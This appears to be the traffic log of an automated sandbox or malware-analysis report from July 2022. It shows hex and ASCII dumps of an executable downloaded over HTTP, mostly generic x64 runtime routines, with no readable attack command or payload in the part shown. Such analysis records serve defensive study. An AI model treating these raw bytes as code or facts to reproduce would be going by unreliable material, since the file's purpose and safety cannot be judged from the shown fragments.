                                                                                                                                                            2022-07-07 07:51:09 UTC122INData Raw: f1 07 00 00 48 85 db 75 08 8d 4b 20 e8 9c 86 ff ff 48 8b c3 48 83 c4 20 5b c3 cc cc cc 48 89 0d bd 5c 09 00 c3 40 53 48 81 ec e0 05 00 00 83 64 24 70 00 48 8d 4c 24 74 33 d2 41 b8 94 00 00 00 e8 14 8c ff ff 4c 8d 5c 24 70 48 8d 84 24 10 01 00 00 48 8d 8c 24 10 01 00 00 4c 89 5c 24 48 48 89 44 24 50 ff 15 c7 8d 07 00 48 8b 9c 24 08 02 00 00 48 8d 54 24 40 48 8b cb 45 33 c0 e8 05 23 01 00 48 85 c0 74 3b 48 83 64 24 38 00 48 8b 54 24 40 48 8d 4c 24 60 48 89 4c 24 30 48 8d 4c 24 58 4c 8b c8 48 89 4c 24 28 48 8d 8c 24 10 01 00 00 4c 8b c3 48 89 4c 24 20 33 c9 e8 c1 22 01 00 eb 20 48 8b 84 24 e8 05 00 00 48 89 84 24 08 02 00 00 48 8d 84 24 e8 05 00 00 48 89 84 24 a8 01 00 00 48 8b 84 24 e8 05 00 00 c7 44 24 70 17 04 00 c0 c7 44 24 74 01 00 00 00 48 89 84 24 80
                                                                                                                                                            Data Ascii: HuK HH [H\@SHd$pHL$t3AL\$pH$H$L\$HHD$PH$HT$@HE3#Ht;Hd$8HT$@HL$`HL$0HL$XLHL$(H$LHL$ 3" H$H$H$H$H$D$pD$tH$
                                                                                                                                                            2022-07-07 07:51:09 UTC126INData Raw: aa 00 00 41 3b c7 74 08 41 bc 0a 00 00 00 eb 41 66 83 3b 78 74 0e 66 83 3b 58 74 08 41 bc 08 00 00 00 eb 2d 41 bc 10 00 00 00 41 83 fc 10 75 21 0f b7 ce e8 00 aa 00 00 41 3b c7 75 14 66 83 3b 78 74 06 66 83 3b 58 75 08 66 8b 73 02 48 83 c3 04 33 d2 83 c8 ff 41 f7 f4 44 8b f8 44 8b f2 0f b7 ce e8 d1 a9 00 00 83 f8 ff 75 2b b8 41 00 00 00 66 3b c6 77 06 66 83 fe 5a 76 09 8d 46 9f 66 83 f8 19 77 2e 8d 46 9f 66 83 f8 19 0f b7 c6 77 03 83 e8 20 83 c0 c9 41 3b c4 73 17 83 cd 08 41 3b ff 72 2c 75 05 41 3b c6 76 25 83 cd 04 4d 85 ed 75 23 4c 8b b4 24 98 00 00 00 48 83 eb 02 40 f6 c5 08 75 1a 4d 85 ed 49 0f 45 de 33 ff eb 5a 41 0f af fc 03 f8 66 8b 33 48 83 c3 02 eb 80 be ff ff ff 7f 40 f6 c5 04 75 1d 40 f6 c5 01 75 3a 8b c5 83 e0 02 74 08 81 ff 00 00 00 80 77 08
                                                                                                                                                            Data Ascii: A;tAAf;xtf;XtA-AAu!A;uf;xtf;XufsH3ADDu+Af;wfZvFfw.Ffw A;sA;r,uA;v%Mu#L$H@uMIE3ZAf3H@u@u:tw
                                                                                                                                                            2022-07-07 07:51:09 UTC129INData Raw: 0c ff cf 66 44 39 10 74 09 48 83 c0 02 41 3b fa 75 ef 48 2b c3 48 d1 f8 44 8b f0 e9 9a fe ff ff 41 bd 10 00 00 00 0f ba ed 0f b8 07 00 00 00 89 44 24 74 41 b9 10 00 00 00 40 84 ed 79 64 66 83 c0 51 66 44 89 5c 24 5c 41 8d 51 f2 66 89 44 24 5e eb 53 41 b9 08 00 00 00 40 84 ed 79 44 0f ba ed 09 eb 3e 49 8b 3f 49 83 c7 08 e8 e3 a3 00 00 45 33 d2 41 3b c2 0f 84 de fb ff ff 45 8d 42 20 41 84 e8 74 05 66 89 37 eb 02 89 37 c7 44 24 60 01 00 00 00 e9 ad 03 00 00 83 cd 40 41 b9 0a 00 00 00 8b 54 24 4c 0f ba e5 0f 72 06 0f ba e5 0c 73 09 4d 8b 07 49 83 c7 08 eb 2d 49 83 c7 08 41 84 e8 74 14 40 f6 c5 40 74 07 4d 0f bf 47 f8 eb 17 45 0f b7 47 f8 eb 10 40 f6 c5 40 74 06 4d 63 47 f8 eb 04 45 8b 47 f8 40 f6 c5 40 74 0c 4d 3b c2 7d 07 49 f7 d8 0f ba ed 08 0f ba e5 0f 72
                                                                                                                                                            Data Ascii: fD9tHA;uH+HDAD$tA@ydfQfD\$\AQfD$^SA@yD>I?IE3A;EB Atf77D$`@AT$LrsMI-IAt@@tMGEG@@tMcGEG@@tM;}Ir
                                                                                                                                                            2022-07-07 07:51:09 UTC133INData Raw: b9 04 00 00 00 49 83 e8 02 e9 46 fd ff ff 44 8b c9 41 83 e9 06 0f 84 c6 00 00 00 b8 01 00 00 00 44 2b c8 0f 84 87 00 00 00 44 2b c8 74 4d 44 2b c8 0f 84 e7 00 00 00 41 83 f9 02 0f 85 d3 00 00 00 39 9c 24 20 01 00 00 0f 84 72 ff ff ff 0f b7 c2 4d 8d 58 fe 83 f8 2b 74 17 83 f8 2d 0f 85 13 01 00 00 b9 07 00 00 00 41 83 cf ff e9 5e fe ff ff b9 07 00 00 00 e9 54 fe ff ff 44 8b f0 41 b9 30 00 00 00 eb 08 66 41 8b 10 49 83 c0 02 66 41 3b d1 74 f2 66 83 ea 31 b9 08 00 00 00 66 3b d1 0f 87 1a ff ff ff b9 09 00 00 00 e9 55 ff ff ff 8d 42 cf b9 08 00 00 00 66 3b c1 77 0a b9 09 00 00 00 e9 04 fe ff ff 41 b9 30 00 00 00 66 41 3b d1 0f 85 9f 00 00 00 b8 01 00 00 00 e9 73 fc ff ff 8d 42 cf b9 08 00 00 00 4d 8d 58 fc 66 3b c1 76 cb 0f b7 c2 83 f8 2b 74 12 83 f8 2d 0f 84
                                                                                                                                                            Data Ascii: IFDAD+D+tMD+A9$ rMX+t-A^TDA0fAIfA;tf1f;UBf;wA0fA;sBMXf;v+t-
                                                                                                                                                            2022-07-07 07:51:09 UTC137INData Raw: bd 0d 00 00 00 45 85 f6 0f 84 af 00 00 00 48 8b 44 24 50 48 83 64 24 20 00 40 88 6c 24 5c 48 8d 0d e8 61 0a 00 4c 8d 4c 24 4c 44 8d 45 f4 48 8b 0c c1 48 8d 54 24 5c 49 8b 0c 0f ff 15 54 4c 07 00 85 c0 0f 84 e6 00 00 00 83 7c 24 4c 01 7c 7b ff 44 24 40 ff c7 eb 65 40 80 fe 01 74 06 40 80 fe 02 75 17 0f b7 03 45 33 f6 66 83 f8 0a 66 89 44 24 44 41 0f 94 c6 48 83 c3 02 40 80 fe 01 74 06 40 80 fe 02 75 36 0f b7 4c 24 44 e8 44 a0 00 00 66 3b 44 24 44 0f 85 93 00 00 00 83 c7 02 45 85 f6 74 19 8b cd 66 89 6c 24 44 e8 25 a0 00 00 66 3b 44 24 44 75 78 ff c7 ff 44 24 40 8b c3 41 2b c4 41 3b c5 0f 82 01 fe ff ff 8b 5c 24 4c 4c 8b 74 24 50 8b 6c 24 40 85 ff 0f 85 b8 03 00 00 85 db 0f 84 7a 03 00 00 83 fb 05 0f 85 65 03 00 00 e8 3b c3 ff ff c7 00 09 00 00 00 e8 50 c3
                                                                                                                                                            Data Ascii: EHD$PHd$ @l$\HaLL$LDEHHT$\ITL|$L|{D$@e@t@uE3ffD$DAH@t@u6L$DDf;D$DEtfl$D%f;D$DuxD$@A+A;\$LLt$Pl$@ze;P
                                                                                                                                                            2022-07-07 07:51:09 UTC142INData Raw: 0f ff ff ff 3c 58 0f 84 07 ff ff ff 44 89 54 24 5c 48 8d 54 24 78 40 0f b6 cd 44 89 54 24 50 e8 80 40 ff ff 33 f6 3b c6 74 21 48 8b 54 24 68 4c 8d 44 24 40 40 8a cd e8 3c f5 ff ff 40 8a 2f 48 ff c7 40 3a ee 0f 84 02 01 00 00 48 8b 54 24 68 4c 8d 44 24 40 40 8a cd e8 1b f5 ff ff 45 33 d2 e9 99 fe ff ff 40 80 fd 2a 75 19 45 8b 75 00 49 83 c5 08 45 3b f2 0f 8d 97 fe ff ff 45 8b f7 e9 8f fe ff ff 43 8d 0c b6 40 0f be c5 44 8d 74 48 d0 e9 7d fe ff ff 45 8b f2 e9 75 fe ff ff 40 80 fd 2a 75 1d 41 8b 45 00 49 83 c5 08 41 3b c2 89 44 24 54 0f 8d 5a fe ff ff 41 83 cc 04 f7 d8 eb 0f 8b 44 24 54 8d 0c 80 40 0f be c5 8d 44 48 d0 89 44 24 54 e9 3a fe ff ff 40 80 fd 20 74 41 40 80 fd 23 74 31 40 80 fd 2b 74 22 40 80 fd 2d 74 13 40 80 fd 30 0f 85 18 fe ff ff 41 83 cc 08
                                                                                                                                                            Data Ascii: <XDT$\HT$x@DT$P@3;t!HT$hLD$@@<@/H@:HT$hLD$@@E3@*uEuIE;EC@DtH}Eu@*uAEIA;D$TZAD$T@DHD$T:@ tA@#t1@+t"@-t@0A
                                                                                                                                                            2022-07-07 07:51:09 UTC146INData Raw: 75 09 40 84 b8 b8 00 00 00 75 0a 3b f9 75 1d f6 40 60 01 74 17 e8 d5 d8 ff ff b9 01 00 00 00 48 8b d8 e8 c8 d8 ff ff 48 3b c3 74 1e 8b cf e8 bc d8 ff ff 48 8b c8 ff 15 ff 2d 07 00 85 c0 75 0a ff 15 ed 2d 07 00 8b d8 eb 02 33 db 8b cf e8 f0 d7 ff ff 4c 8b df 48 8b cf 48 c1 f9 05 41 83 e3 1f 48 8d 15 9b 40 0a 00 48 8b 0c ca 4d 6b db 58 42 c6 44 19 08 00 85 db 74 0c 8b cb e8 e6 a2 ff ff 83 c8 ff eb 02 33 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 18 48 89 74 24 20 89 4c 24 08 57 41 54 41 55 48 83 ec 30 48 63 d9 83 fb fe 75 1c e8 90 a2 ff ff 33 ff 89 38 e8 67 a2 ff ff c7 00 09 00 00 00 83 c8 ff e9 c9 00 00 00 33 ff 3b df 0f 8c 96 00 00 00 3b 1d 21 40 0a 00 0f 83 8a 00 00 00 48 8b f3 4c 8b e3 49 c1 fc 05 4c 8d 2d 0e 40 0a 00 83 e6 1f 48 6b f6 58 4b 8b 44
                                                                                                                                                            Data Ascii: u@u;u@`tHH;tH-u-3LHHAH@HMkXBDt3H\$0H _H\$Ht$ L$WATAUH0Hcu38g3;;!@HLIL-@HkXKD
                                                                                                                                                            2022-07-07 07:51:09 UTC150INData Raw: 48 8b c2 48 c1 ea 0a 49 23 c6 48 89 44 24 58 49 0f af ca 48 03 ca 4b 8b 54 c1 b8 48 8b c1 48 c1 e9 0a 49 23 c6 48 89 44 24 50 49 0f af d2 48 03 d1 4b 8b 4c c1 b0 48 8b c2 48 c1 ea 0a 49 23 c6 48 89 44 24 48 49 0f af ca 48 03 ca 4b 8b 54 c1 a8 48 8b c1 48 c1 e9 0a 49 23 c6 48 89 44 24 40 49 0f af d2 48 03 d1 4b 8b 4c c1 a0 48 8b c2 48 c1 ea 0a 49 23 c6 48 89 44 24 38 49 0f af ca 48 03 ca 4b 8b 54 c1 98 48 8b c1 48 c1 e9 0a 49 23 c6 48 89 44 24 30 49 0f af d2 48 03 d1 4b 8b 4c c1 90 48 8b c2 48 c1 ea 0a 49 23 c6 48 89 44 24 28 49 0f af ca 48 03 ca 4b 8b 54 c1 88 48 8b c1 48 c1 e9 0a 49 23 c6 48 89 44 24 20 49 0f af d2 48 03 d1 4b 8b 4c c1 80 48 8b c2 48 c1 ea 0a 49 23 c6 48 89 44 24 18 49 0f af ca 48 03 ca 4b 8b 94 c1 70 ff ff ff 48 8b c1 48 c1 e9 0a 49 23
                                                                                                                                                            Data Ascii: HHI#HD$XIHKTHHI#HD$PIHKLHHI#HD$HIHKTHHI#HD$@IHKLHHI#HD$8IHKTHHI#HD$0IHKLHHI#HD$(IHKTHHI#HD$ IHKLHHI#HD$IHKpHHI#
                                                                                                                                                            2022-07-07 07:51:09 UTC154INData Raw: 0a be 01 00 00 00 e9 9c 01 00 00 48 8b cf e8 26 13 ff ff 4c 8b c7 48 8d 50 01 48 8b 0d 48 e3 08 00 e8 b3 36 00 00 41 3b c6 0f 84 78 01 00 00 4c 89 74 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 e2 7f ff ff e9 5f 01 00 00 48 8b 0d 1a e3 08 00 49 3b ce 74 0c e8 a8 15 ff ff 4c 89 35 09 e3 08 00 48 8d 0d 52 e2 08 00 ff 15 34 0e 07 00 83 f8 ff 0f 84 2c 01 00 00 c7 05 e5 e2 08 00 01 00 00 00 8b 0d 33 e2 08 00 6b c9 3c 89 8c 24 90 00 00 00 66 44 39 35 67 e2 08 00 74 16 8b 15 6d e2 08 00 8b c2 6b c0 3c 03 c8 89 8c 24 90 00 00 00 eb 06 8b 15 57 e2 08 00 66 44 39 35 95 e2 08 00 74 24 8b 05 9b e2 08 00 41 3b c6 74 19 c7 84 24 98 00 00 00 01 00 00 00 2b c2 6b c0 3c 89 84 24 a0 00 00 00 eb 10 44 89 b4 24 98 00 00 00 44 89 b4 24 a0 00 00 00 48 8d 84 24 a8 00 00 00 48 89 44
                                                                                                                                                            Data Ascii: H&LHPHH6A;xLt$ E3E333_HI;tL5HR4,3k<$fD95gtmk<$WfD95t$A;t$+k<$D$D$H$HD
                                                                                                                                                            2022-07-07 07:51:09 UTC158INData Raw: 44 89 33 e8 90 71 ff ff bb 22 00 00 00 45 33 c9 45 33 c0 33 d2 33 c9 89 18 4c 89 74 24 20 e8 a5 70 ff ff 44 38 74 24 48 0f 84 05 ff ff ff 48 8b 4c 24 40 83 a1 c8 00 00 00 fd e9 f4 fe ff ff 48 8b c7 bd 50 00 00 00 66 44 89 74 43 fe 49 3b f6 74 03 48 89 06 44 38 74 24 48 74 0c 48 8b 4c 24 40 83 a1 c8 00 00 00 fd 8b c5 4c 8d 5c 24 50 49 8b 5b 20 49 8b 6b 28 49 8b 73 30 49 8b e3 41 5e 41 5d 5f c3 48 89 5c 24 08 48 89 7c 24 10 45 33 d2 44 8b d9 44 39 54 24 28 74 5e 4d 8b 10 eb 33 b8 67 66 66 66 41 f7 eb c1 fa 02 8b c2 c1 e8 1f 03 d0 8a c2 c0 e0 02 8d 0c 10 02 c9 44 2a d9 41 80 c3 30 45 88 1a 49 ff 09 49 ff c2 44 8b da 85 d2 7e 06 49 83 39 01 77 c7 49 8b 10 4d 89 10 49 ff ca 8a 02 41 8a 0a 41 88 02 88 0a 48 ff c2 49 ff ca 49 3b d2 72 eb eb 5a 48 63 c2 49 3b 01
                                                                                                                                                            Data Ascii: D3q"E3E333Lt$ pD8t$HHL$@HPfDtCI;tHD8t$HtHL$@L\$PI[ Ik(Is0IA^A]_H\$H|$E3DD9T$(t^M3gfffAD*A0EIID~I9wIMIAAHII;rZHcI;
                                                                                                                                                            2022-07-07 07:51:09 UTC161INData Raw: 41 2b cb 74 07 41 3b cb 74 05 eb 24 41 8b db b2 53 eb 66 41 2b cb 74 07 41 3b cb 74 05 eb 11 41 8b db b2 4d eb 53 41 2b cb 74 49 41 3b cb 74 47 49 8b d5 41 8b c8 e8 f8 f1 fe ff 45 33 c0 45 8d 58 01 41 3b c0 74 1b 4c 39 1e 76 16 44 38 47 01 74 63 8a 07 49 8b 0e 48 ff c7 88 01 4d 01 1e 48 ff 0e 8a 07 49 8b 0e 49 03 fb 88 01 4d 01 1e 48 ff 0e eb 31 41 8b db b2 49 4c 8b 45 00 89 5c 24 30 4d 8b ce 49 8b cd 4c 89 7c 24 28 48 89 74 24 20 e8 6d f4 ff ff 45 33 c0 41 3b c0 74 17 45 8d 58 01 49 8b fc 8a 07 41 3a c0 74 0d 4c 8b 4d 00 e9 9b fc ff ff 33 c0 eb 03 41 8b c3 48 8b 4d 20 48 33 cd e8 bf 06 00 00 48 8b 5d 60 48 8b 75 68 48 8b 7d 70 48 8d 65 30 41 5f 41 5e 41 5d 41 5c 5d c3 cc 48 8b c4 48 89 58 10 48 89 68 18 48 89 48 08 56 57 41 54 41 55 41 56 48 83 ec 70 48
                                                                                                                                                            Data Ascii: A+tA;t$ASfA+tA;tAMSA+tIA;tGIAE3EXA;tL9vD8GtcIHMHIIMH1AILE\$0MIL|$(Ht$ mE3A;tEXIA:tLM3AHM H3H]`HuhH}pHe0A_A^A]A\]HHXHhHHVWATAUAVHpH
                                                                                                                                                            2022-07-07 07:51:09 UTC165INData Raw: 8b fa 48 85 c9 74 32 33 d2 48 8d 42 e0 48 f7 f1 48 3b c7 73 24 e8 9c 54 ff ff 48 83 64 24 20 00 45 33 c9 45 33 c0 33 d2 33 c9 c7 00 0c 00 00 00 e8 b1 53 ff ff 33 c0 eb 5d 48 0f af f9 b8 01 00 00 00 48 85 ff 48 0f 44 f8 33 c0 48 83 ff e0 77 18 48 8b 0d d2 b4 08 00 8d 50 08 4c 8b c7 ff 15 1e dc 06 00 48 85 c0 75 2d 83 3d b2 b4 08 00 00 74 19 48 8b cf e8 0c dd fe ff 85 c0 75 cb 48 85 db 74 b2 c7 03 0c 00 00 00 eb aa 48 85 db 74 06 c7 03 0c 00 00 00 48 8b 5c 24 40 48 83 c4 30 5f c3 cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b da 48 8b f9 48 85 c9 75 0a 48 8b ca e8 b6 e5 fe ff eb 6a 48 85 d2 75 07 e8 ca e7 fe ff eb 5c 48 83 fa e0 77 43 48 8b 0d 4b b4 08 00 b8 01 00 00 00 48 85 db 48 0f 44 d8 4c 8b c7 33 d2 4c 8b cb ff 15 79 e0 06 00 48 8b f0 48 85 c0
                                                                                                                                                            Data Ascii: Ht23HBHH;s$THd$ E3E333S3]HHHD3HwHPLHu-=tHuHtHtH\$@H0_H\$Ht$WH HHHuHjHu\HwCHKHHDL3LyHH
                                                                                                                                                            2022-07-07 07:51:09 UTC169INData Raw: c9 45 33 c0 33 d2 33 c9 e8 54 43 ff ff 48 83 c8 ff eb 71 8b cb e8 63 7a ff ff 90 4b 8b 04 f7 f6 44 30 08 01 74 12 45 8b c4 49 8b d5 8b cb e8 9a fe ff ff 48 8b f8 eb 16 e8 f4 43 ff ff c7 00 09 00 00 00 e8 09 44 ff ff 89 38 48 83 cf ff 8b cb e8 d0 7a ff ff 48 8b c7 eb 2a e8 f2 43 ff ff 89 38 e8 cb 43 ff ff c7 00 09 00 00 00 48 89 7c 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 e1 42 ff ff 48 83 c8 ff 48 8b 5c 24 68 48 8b 74 24 70 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f c3 cc 40 53 48 83 ec 20 ff 05 e4 9d 08 00 48 8b d9 b9 00 10 00 00 e8 a7 31 ff ff 48 89 43 10 48 85 c0 74 0d 83 4b 18 08 c7 43 24 00 10 00 00 eb 13 83 4b 18 04 48 8d 43 20 c7 43 24 02 00 00 00 48 89 43 10 48 8b 43 10 83 63 08 00 48 89 03 48 83 c4 20 5b c3 cc 48 83 ec 38 83 f9 fe 75 0d e8 32 43 ff ff
                                                                                                                                                            Data Ascii: E333TCHqczKD0tEIHCD8HzH*C8CH|$ E3E333BHH\$hHt$pH0A_A^A]A\_@SH H1HCHtKC$KHC C$HCHCcHH [H8u2C
                                                                                                                                                            2022-07-07 07:51:09 UTC174INData Raw: fb 7d e3 48 8b 94 24 88 00 00 00 44 2b 3d 2a 34 08 00 41 8a cf 41 d3 e0 f7 9c 24 80 00 00 00 1b c0 25 00 00 00 80 44 0b c0 8b 05 11 34 08 00 44 0b 44 24 20 83 f8 40 75 0c 8b 44 24 24 44 89 42 04 89 02 eb 08 83 f8 20 75 03 44 89 02 8b c3 48 83 c4 40 41 5f 41 5e 41 5d 41 5c 5f 5e 5b c3 cc 40 53 48 83 ec 40 48 8b d9 48 8d 4c 24 20 e8 21 b4 fe ff 0f be 0b e8 c9 db fe ff 83 f8 65 74 0f 48 ff c3 0f b6 0b e8 45 c7 fe ff 85 c0 75 f1 0f be 0b e8 ad db fe ff 83 f8 78 75 04 48 83 c3 02 48 8b 44 24 20 8a 13 48 8b 88 28 01 00 00 48 8b 01 8a 08 88 0b 48 ff c3 8a 03 88 13 8a d0 8a 03 48 ff c3 84 c0 75 f1 38 44 24 38 74 0c 48 8b 44 24 30 83 a0 c8 00 00 00 fd 48 83 c4 40 5b c3 cc 40 53 48 83 ec 40 48 8b d9 48 8d 4c 24 20 e8 a1 b3 fe ff 44 8a 1b 48 8b 4c 24 20 45 84 db 74
                                                                                                                                                            Data Ascii: }H$D+=*4AA$%D4DD$ @uD$$DB uDH@A_A^A]A\_^[@SH@HHL$ !etHEuxuHHD$ H(HHHu8D$8tHD$0H@[@SH@HHL$ DHL$ Et
                                                                                                                                                            2022-07-07 07:51:09 UTC178INData Raw: d0 b8 f0 ff 00 00 44 89 43 08 66 03 f8 89 53 04 89 0b 45 85 c0 74 d1 0f ba 63 08 0f 72 36 8b 4b 04 8b 03 8b d0 03 c0 44 8b c1 89 03 8d 04 09 c1 ea 1f 0b c2 41 c1 e8 1f b9 ff ff 00 00 89 43 04 8b 43 08 66 03 f9 03 c0 41 0b c0 0f ba e0 0f 89 43 08 73 ca 66 89 7b 0a 48 8b 4c 24 10 48 33 cc e8 bd c5 ff ff 48 8b 5c 24 40 48 8b 6c 24 48 48 83 c4 20 41 5d 5f 5e c3 cc cc 48 83 ec 68 48 8b 05 0d 23 08 00 48 33 c4 48 89 44 24 50 83 3d 9a 26 08 00 00 66 89 4c 24 40 74 66 48 8b 0d 18 27 08 00 48 83 f9 fe 75 0c e8 4d 20 00 00 48 8b 0d 06 27 08 00 48 83 f9 ff 0f 84 b9 00 00 00 48 83 64 24 20 00 4c 8d 4c 24 44 48 8d 54 24 40 41 b8 01 00 00 00 ff 15 e8 af 06 00 85 c0 0f 85 89 00 00 00 83 3d 45 26 08 00 02 0f 85 88 00 00 00 ff 15 ed ad 06 00 83 f8 78 75 7d 83 25 2d 26 08
                                                                                                                                                            Data Ascii: DCfSEtcr6KDACCfACsf{HL$H3H\$@Hl$HH A]_^HhH#H3HD$P=&fL$@tfH'HuM H'HHd$ LL$DHT$@A=E&xu}%-&
                                                                                                                                                            2022-07-07 07:51:09 UTC182INData Raw: 00 40 00 00 74 0c 41 3b cc 75 11 0d 00 03 00 00 eb 0a 0f ba e8 09 eb 04 0f ba e8 08 41 81 e3 40 80 00 00 41 83 eb 40 74 1c 41 81 eb c0 7f 00 00 74 0c 41 83 fb 40 75 11 0f ba e8 18 eb 0b 0d 00 00 00 03 eb 04 0f ba e8 19 8b cb f7 d1 23 c8 23 f3 0b ce 3b c8 0f 84 9a 01 00 00 41 84 cf 8b df 41 0f 45 de 89 5c 24 40 f6 c1 08 74 08 0f ba eb 09 89 5c 24 40 f6 c1 04 74 08 0f ba eb 0a 89 5c 24 40 f6 c1 02 74 08 0f ba eb 0b 89 5c 24 40 f6 c1 01 74 08 0f ba eb 0c 89 5c 24 40 0f ba e1 13 73 08 0f ba eb 08 89 5c 24 40 8b c1 25 00 03 00 00 74 30 3d 00 01 00 00 74 21 3d 00 02 00 00 74 10 3d 00 03 00 00 75 1b 41 0b dc 89 5c 24 40 eb 12 0f ba eb 0e 89 5c 24 40 eb 08 0f ba eb 0d 89 5c 24 40 81 e1 00 00 00 03 81 f9 00 00 00 01 74 23 81 f9 00 00 00 02 74 12 81 f9 00 00 00 03
                                                                                                                                                            Data Ascii: @tA;uA@A@tAtA@u##;AAE\$@t\$@t\$@t\$@t\$@s\$@%t0=t!=t=uA\$@\$@\$@t#t
                                                                                                                                                            2022-07-07 07:51:09 UTC186INData Raw: b8 03 00 00 00 48 8d 0d 2c cb 06 00 45 33 c9 ba 00 00 00 40 44 89 44 24 20 ff 15 a1 8f 06 00 48 89 05 8a 06 08 00 48 83 c4 48 c3 cc 48 83 ec 28 48 8b 0d 79 06 08 00 48 83 f9 ff 74 0c 48 83 f9 fe 74 06 ff 15 97 8d 06 00 48 8b 0d 58 06 08 00 48 83 f9 ff 74 0c 48 83 f9 fe 74 06 ff 15 7e 8d 06 00 48 83 c4 28 c3 cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 55 41 57 48 83 ec 20 48 8b ea 33 ff 33 d2 44 8d 47 01 8b f1 e8 d1 bc ff ff 4c 8b e8 48 83 f8 ff 74 50 44 8d 47 02 33 d2 8b ce e8 bb bc ff ff 48 83 f8 ff 74 3d 48 8b dd 48 2b d8 48 3b df 0f 8e c1 00 00 00 ff 15 30 8b 06 00 41 bf 00 10 00 00 8d 57 08 48 8b c8 4d 8b c7 ff 15 bb 89 06 00 48 8b e8 48 3b c7 75 31 e8 e2 01 ff ff c7 00 0c 00 00 00 e8 d7 01 ff ff 8b 00 48 8b 5c 24 40 48 8b 6c
                                                                                                                                                            Data Ascii: H,E3@DD$ HHHH(HyHtHtHXHtHt~H(HHXHhHpHx ATAUAWH H33DGLHtPDG3Ht=HH+H;0AWHMHH;u1H\$@Hl
                                                                                                                                                            2022-07-07 07:51:09 UTC190INData Raw: 41 8b fd 41 3b fc 8d 04 36 44 8b f7 48 63 c8 7e 58 44 8b fe 4c 8d 6d 08 4c 8d 64 0c 70 45 23 fb 33 ed 41 0f b7 45 00 41 0f b7 0c 24 44 8b d5 0f af c8 41 8b 40 fc 8d 14 08 3b d0 72 04 3b d1 73 03 45 8b d3 41 89 50 fc 44 3b d5 74 04 66 45 01 18 45 2b f3 49 83 c4 02 49 83 ed 02 44 3b f5 7f c1 48 8b 6c 24 58 45 33 e4 41 2b fb 49 83 c0 02 41 03 f3 41 3b fc 7f 8b 44 8b 54 24 68 44 8b 44 24 60 b8 02 c0 00 00 66 44 03 c8 41 bf ff ff 00 00 66 45 3b cc 7e 42 41 0f ba e2 1f 72 35 8b 7c 24 64 41 8b d0 45 03 d2 c1 ea 1f 45 03 c0 8b cf c1 e9 1f 8d 04 3f 66 45 03 cf 0b c2 44 0b d1 66 45 3b cc 89 44 24 64 44 89 54 24 68 44 89 44 24 60 7f c4 66 45 3b cc 7f 66 66 45 03 cf 79 60 41 0f b7 c1 66 f7 d8 0f b7 d0 66 44 03 ca 44 84 5c 24 60 74 03 41 03 db 8b 7c 24 64 41 8b c2 41
                                                                                                                                                            Data Ascii: AA;6DHc~XDLmLdpE#3AEA$DA@;r;sEAPD;tfEE+IID;Hl$XE3A+IAA;DT$hDD$`fDAfE;~BAr5|$dAEE?fEDfE;D$dDT$hDD$`fE;ffEy`AffDD\$`tA|$dAA
                                                                                                                                                            2022-07-07 07:51:09 UTC194INData Raw: 4c f5 00 e8 9e 75 fe ff 45 3b fd 74 66 4c 39 6c f5 00 74 1d 48 8d 4c f5 08 48 8b 01 ff c7 48 83 c1 08 48 89 44 f5 00 48 ff c6 4c 39 6c f5 00 75 e8 48 63 d7 48 b8 ff ff ff ff ff ff ff 1f 48 3b d0 0f 83 93 00 00 00 48 8b 0d 88 3b 08 00 41 b8 08 00 00 00 e8 0d d1 fe ff 49 3b c5 74 7c eb 73 48 8b 35 6f 3b 08 00 48 2b fe 48 c1 ff 03 e9 72 ff ff ff 4c 89 64 f5 00 4d 89 2e eb 5d 45 3b fd 0f 85 00 01 00 00 41 3b fd 7d 02 f7 df 8d 47 02 3b c7 0f 8c 84 fe ff ff 4c 63 c0 48 b8 ff ff ff ff ff ff ff 1f 4c 3b c0 0f 83 6e fe ff ff ba 08 00 00 00 48 8b ce e8 ab d0 fe ff 49 3b c5 0f 84 58 fe ff ff 48 63 cf 4c 89 24 c8 4c 89 6c c8 08 4d 89 2e 48 89 05 fc 3a 08 00 44 39 6c 24 78 0f 84 8a 00 00 00 49 8b cc e8 f1 71 fe ff ba 01 00 00 00 48 8d 48 02 e8 5f cf fe ff 48 8b f8 49
                                                                                                                                                            Data Ascii: LuE;tfL9ltHLHHHDHL9luHcHH;H;AI;t|sH5o;H+HrLdM.]E;A;}G;LcHL;nHI;XHcL$LlM.H:D9l$xIqHH_HI
                                                                                                                                                            2022-07-07 07:51:09 UTC198INData Raw: 00 72 19 03 00 93 19 03 00 93 19 03 00 48 19 03 00 93 19 03 00 93 19 03 00 93 19 03 00 85 19 03 00 cc cc cc cc cc cc cc cc 32 c0 e9 21 fa fd ff cc cc cc cc cc cc cc cc cc 83 e8 02 83 f8 09 0f 87 9a 00 00 00 4c 8d 05 0d e6 fc ff 48 98 41 8b 94 80 90 1a 03 00 49 03 d0 ff e2 48 8b 41 10 48 8b 08 66 83 39 30 75 2d 0f b7 41 02 66 83 f8 78 74 06 66 83 f8 58 75 1d 48 8d 54 24 30 48 83 c1 04 41 b8 08 00 00 00 e8 9d e4 00 00 8b 44 24 30 48 83 c4 28 c3 48 83 c4 28 e9 7f 5d fe ff f2 0f 2c 01 48 83 c4 28 c3 33 c0 38 01 0f 95 c0 48 83 c4 28 c3 48 8b 01 8b 40 04 48 83 c4 28 c3 48 8b 09 8b 11 83 fa 04 7f 17 48 8b 49 08 4c 8d 44 24 30 e8 43 e3 00 00 8b 44 24 30 48 83 c4 28 c3 33 c0 48 83 c4 28 c3 0f 1f 00 90 08 01 00 45 1a 03 00 02 1a 03 00 86 1a 03 00 86 1a 03 00 90 08
                                                                                                                                                            Data Ascii: rH2!LHAIHAHf90u-AfxtfXuHT$0HAD$0H(H(],H(38H(H@H(HHILD$0CD$0H(3H(E
